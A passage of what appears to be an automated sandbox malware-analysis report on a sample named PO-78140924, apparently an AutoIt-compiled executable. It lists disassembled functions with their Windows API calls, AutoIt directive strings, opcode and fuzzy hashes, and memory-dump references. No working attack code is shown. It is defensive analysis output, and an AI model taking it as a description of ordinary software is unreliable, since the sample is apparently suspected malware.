                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                • String ID:
                                                • API String ID: 2364484715-0
                                                • Opcode ID: d75d15a4f5d6df424ebdabd0a31abb7656df92a48aa4a9e9e941ed02e6ad1933
                                                • Instruction ID: ce5d77e148aad448dabc9ddfbe088407cc01134e4ab44ec7d00f00ea270a6638
                                                • Opcode Fuzzy Hash: d75d15a4f5d6df424ebdabd0a31abb7656df92a48aa4a9e9e941ed02e6ad1933
                                                • Instruction Fuzzy Hash: 0BE09231210609DFDF11AF44ED59E9937A5FB08355F014065FE05572B2C735AD60EF61
                                                Function 000116B5 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                  • Part of subcall function 0001201B: DestroyWindow.USER32(?), ref: 000120D3
                                                  • Part of subcall function 0001201B: KillTimer.USER32(-00000001,?,?,?,?,000116CB,00000000,?), ref: 0001216E
                                                • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?), ref: 000116D4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                • String ID:
                                                • API String ID: 2797419724-0
                                                • Opcode ID: 8b847860c7045d97124479e6a91277726e86c993f0e0022452397cc00ccaeb34
                                                • Instruction ID: 75a51cc8c0d958c804a3c2f58778739926d10f88f91a85915b9567aa5b65fbd0
                                                • Opcode Fuzzy Hash: 8b847860c7045d97124479e6a91277726e86c993f0e0022452397cc00ccaeb34
                                                • Instruction Fuzzy Hash: 72D01270140708B7DB112B50DC17FD93A199B58751F508021BB04691D3CA75A870A568
                                                Function 0009C8CA Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtdllDialogWndProc_W.NTDLL ref: 0009C8EF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: DialogNtdllProc_
                                                • String ID:
                                                • API String ID: 3239928679-0
                                                • Opcode ID: 54e3e32415a6d833a03a2fa6fb45f4f26d9eb320f14f10638897ff6c41afc7aa
                                                • Instruction ID: be21d914fe4d65ccafdd0e96bbd10a8cc9a04f128ebda3222a2bc557c3de568d
                                                • Opcode Fuzzy Hash: 54e3e32415a6d833a03a2fa6fb45f4f26d9eb320f14f10638897ff6c41afc7aa
                                                • Instruction Fuzzy Hash: 54E0E235200649EFDB01DF88DC84E963BA5BB1D301F014055FE0557262CB71A820EB61
                                                Function 0009C8F9 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtdllDialogWndProc_W.NTDLL ref: 0009C91E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: DialogNtdllProc_
                                                • String ID:
                                                • API String ID: 3239928679-0
                                                • Opcode ID: ad8d085d2f778ed2fbc6aa41d92f40376b1f39091124bf04f47eb99e942cba48
                                                • Instruction ID: 814f325b27fc8bc8f24f7fee60c887b47b4566629d701bed223901c14fe2fdcc
                                                • Opcode Fuzzy Hash: ad8d085d2f778ed2fbc6aa41d92f40376b1f39091124bf04f47eb99e942cba48
                                                • Instruction Fuzzy Hash: 48E0E235200649EFDB01DF88D844D963BA5BB1D300F014055FE0547262CB71A820EBA1
                                                Function 00011AC2 Relevance: 1.5, APIs: 1, Instructions: 11nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtdllDialogWndProc_W.NTDLL(?,?), ref: 000119FA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: DialogNtdllProc_
                                                • String ID:
                                                • API String ID: 3239928679-0
                                                • Opcode ID: ec39a82c6084d2fd6a7db55fec7d7a978d3a82bca3c238033001e9e2bd54a4d9
                                                • Instruction ID: f873048a0127ee54e2ccf6a0662d5d92d4da54e8ebef1fba47455ad868e843bd
                                                • Opcode Fuzzy Hash: ec39a82c6084d2fd6a7db55fec7d7a978d3a82bca3c238033001e9e2bd54a4d9
                                                • Instruction Fuzzy Hash: 42C0483320541AAE9B129E84BD049EE7B29FB98362B204527FB129002293264432AB65
                                                Function 0003A2A4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0003A2AA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 92f3dd0ff590b49467668d00df22d23afa5eb422a106a059818b3bf568094d3b
                                                • Instruction ID: 87d18e3223004e9cd118957b0b1659dd14a150391811e90ee61bbf04a5a9bf81
                                                • Opcode Fuzzy Hash: 92f3dd0ff590b49467668d00df22d23afa5eb422a106a059818b3bf568094d3b
                                                • Instruction Fuzzy Hash: AFA0123000010DE78A001B51EC044547F5CE7001907008021F40C8002187B655504580
                                                Function 00032345 Relevance: .3, Instructions: 345COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                • Instruction ID: 3587bb4acef734d7e986c181eb5ec64e26c8f2fc4d9101c42c451e340f81bc77
                                                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                • Instruction Fuzzy Hash: 49C183322051930ADBAF4639843417EFEE95FA67B271A076DE4B3CB0D5EF20C564D620
                                                Function 0003277A Relevance: .3, Instructions: 341COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                • Instruction ID: 312b1e18b2ca6710dfb7f741db91258995a42cb41db2fec581939efcf02148e9
                                                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                • Instruction Fuzzy Hash: A6C173322151930ADFAF463A843417EBFE95BA67B271A076DE4B2DB1C5EF20C524D620
                                                Function 00031F10 Relevance: .3, Instructions: 331COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                • Instruction ID: 305ff9cf97c142c2c925870caa60d7b2c3fe7203d673346cebd46b67ff157b95
                                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                • Instruction Fuzzy Hash: 69C1A3322051930EDFAF4639847407EBEE95BA67B271A076DE4B3CB1C5EF20D528D620
                                                Function 00031AF8 Relevance: .3, Instructions: 323COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                • Instruction ID: f7cadb08bff44aa938e5d3ba9313c8c4cf62e7b6ac8227b0729f95ee699c6a29
                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                • Instruction Fuzzy Hash: B8C172322151930DDFAF463984340BEBEE95BAA7B271A176DE4B3CB1C5EF20C524D620
                                                Function 0009A60C Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetTextColor.GDI32(?,00000000), ref: 0009A662
                                                • GetSysColorBrush.USER32(0000000F), ref: 0009A693
                                                • GetSysColor.USER32(0000000F), ref: 0009A69F
                                                • SetBkColor.GDI32(?,000000FF), ref: 0009A6B9
                                                • SelectObject.GDI32(?,00000000), ref: 0009A6C8
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0009A6F3
                                                • GetSysColor.USER32(00000010), ref: 0009A6FB
                                                • CreateSolidBrush.GDI32(00000000), ref: 0009A702
                                                • FrameRect.USER32(?,?,00000000), ref: 0009A711
                                                • DeleteObject.GDI32(00000000), ref: 0009A718
                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 0009A763
                                                • FillRect.USER32(?,?,00000000), ref: 0009A795
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0009A7C0
                                                  • Part of subcall function 0009A8FC: GetSysColor.USER32(00000012), ref: 0009A935
                                                  • Part of subcall function 0009A8FC: SetTextColor.GDI32(?,?), ref: 0009A939
                                                  • Part of subcall function 0009A8FC: GetSysColorBrush.USER32(0000000F), ref: 0009A94F
                                                  • Part of subcall function 0009A8FC: GetSysColor.USER32(0000000F), ref: 0009A95A
                                                  • Part of subcall function 0009A8FC: GetSysColor.USER32(00000011), ref: 0009A977
                                                  • Part of subcall function 0009A8FC: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0009A985
                                                  • Part of subcall function 0009A8FC: SelectObject.GDI32(?,00000000), ref: 0009A996
                                                  • Part of subcall function 0009A8FC: SetBkColor.GDI32(?,00000000), ref: 0009A99F
                                                  • Part of subcall function 0009A8FC: SelectObject.GDI32(?,?), ref: 0009A9AC
                                                  • Part of subcall function 0009A8FC: InflateRect.USER32(?,000000FF,000000FF), ref: 0009A9CB
                                                  • Part of subcall function 0009A8FC: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0009A9E2
                                                  • Part of subcall function 0009A8FC: GetWindowLongW.USER32(00000000,000000F0), ref: 0009A9F7
                                                  • Part of subcall function 0009A8FC: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0009AA1F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                • String ID:
                                                • API String ID: 3521893082-0
                                                • Opcode ID: cd3a384d50a2b0e209bd24677c43015e20d438a221f3271aa2f79c0ccdb813b9
                                                • Instruction ID: 2f693a96da4af6414748374c594142296d581ebedb94bad00a80a8b7e7fde45e
                                                • Opcode Fuzzy Hash: cd3a384d50a2b0e209bd24677c43015e20d438a221f3271aa2f79c0ccdb813b9
                                                • Instruction Fuzzy Hash: C8917071108702EFDB109F64DC08A6BBBE9FF89321F100B2AF562D61A1C775D944DB92
                                                Function 00016A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                • API String ID: 1038674560-86951937
                                                • Opcode ID: 6db4dd9b01a6d5fb20e7ea19487cd4bd8004f2e409650a7e6bfc33d59e49ec68
                                                • Instruction ID: e9d4ad90c17c49adcae810e5639f48316a4a87c025ad496bf132dc3a7a734d6c
                                                • Opcode Fuzzy Hash: 6db4dd9b01a6d5fb20e7ea19487cd4bd8004f2e409650a7e6bfc33d59e49ec68
                                                • Instruction Fuzzy Hash: FC8135B0604206BACB21AF65CCC2FFF77ACAF15750F044035F945AA183EB62DAD1C6A5
                                                Function 00012C18 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 486windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DestroyWindow.USER32(?,?,?), ref: 00012CA2
                                                • DeleteObject.GDI32(00000000), ref: 00012CE8
                                                • DeleteObject.GDI32(00000000), ref: 00012CF3
                                                • DestroyCursor.USER32(00000000), ref: 00012CFE
                                                • DestroyWindow.USER32(00000000,?,?,?), ref: 00012D09
                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 0004C5BB
                                                • 6F540200.COMCTL32(?,000000FF,?), ref: 0004C5F4
                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0004CA1D
                                                  • Part of subcall function 00011B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00012036,?,00000000,?,?,?,?,000116CB,00000000,?), ref: 00011B9A
                                                • SendMessageW.USER32(?,00001053), ref: 0004CA5A
                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0004CA71
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: DestroyMessageSendWindow$DeleteObject$CursorF540200InvalidateMoveRect
                                                • String ID: 0
                                                • API String ID: 22932394-4108050209
                                                • Opcode ID: 218eaf554bf64929b27ae639258d4dd950b15658440efa2cef0d1cc3a9587945
                                                • Instruction ID: 5d4cda65e618657a8724e89d323186e8632b36b113117a09a8b44a7d7f02a4c6
                                                • Opcode Fuzzy Hash: 218eaf554bf64929b27ae639258d4dd950b15658440efa2cef0d1cc3a9587945
                                                • Instruction Fuzzy Hash: 1B128E70605202EFEBA4CF24C888FA9B7E5BF45300F544579E995CB262CB31EC91CB95
                                                Function 0009A8FC Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSysColor.USER32(00000012), ref: 0009A935
                                                • SetTextColor.GDI32(?,?), ref: 0009A939
                                                • GetSysColorBrush.USER32(0000000F), ref: 0009A94F
                                                • GetSysColor.USER32(0000000F), ref: 0009A95A
                                                • CreateSolidBrush.GDI32(?), ref: 0009A95F
                                                • GetSysColor.USER32(00000011), ref: 0009A977
                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0009A985
                                                • SelectObject.GDI32(?,00000000), ref: 0009A996
                                                • SetBkColor.GDI32(?,00000000), ref: 0009A99F
                                                • SelectObject.GDI32(?,?), ref: 0009A9AC
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0009A9CB
                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0009A9E2
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0009A9F7
                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0009AA1F
                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0009AA46
                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 0009AA64
                                                • DrawFocusRect.USER32(?,?), ref: 0009AA6F
                                                • GetSysColor.USER32(00000011), ref: 0009AA7D
                                                • SetTextColor.GDI32(?,00000000), ref: 0009AA85
                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0009AA99
                                                • SelectObject.GDI32(?,0009A62C), ref: 0009AAB0
                                                • DeleteObject.GDI32(?), ref: 0009AABB
                                                • SelectObject.GDI32(?,?), ref: 0009AAC1
                                                • DeleteObject.GDI32(?), ref: 0009AAC6
                                                • SetTextColor.GDI32(?,?), ref: 0009AACC
                                                • SetBkColor.GDI32(?,?), ref: 0009AAD6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                • String ID:
                                                • API String ID: 1996641542-0
                                                • Opcode ID: 509778713678f12214e649b2e50c82dd5ab2170a27a3b5d0dc6c8f257326c799
                                                • Instruction ID: 49bc923bd341f3f53435a0fb7482e713e3ab197df7f3ccf27f8370c0dfa84e84
                                                • Opcode Fuzzy Hash: 509778713678f12214e649b2e50c82dd5ab2170a27a3b5d0dc6c8f257326c799
                                                • Instruction Fuzzy Hash: B9511A71900209FFEF119FA4DC48AAEBBB9FB49320F114626F911EB2A1D7759940DB90
                                                Function 000127D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000128BC
                                                • GetSystemMetrics.USER32(00000007), ref: 000128C4
                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000128EF
                                                • GetSystemMetrics.USER32(00000008), ref: 000128F7
                                                • GetSystemMetrics.USER32(00000004), ref: 0001291C
                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00012939
                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00012949
                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0001297C
                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00012990
                                                • GetClientRect.USER32(00000000,000000FF), ref: 000129AE
                                                • GetStockObject.GDI32(00000011), ref: 000129CA
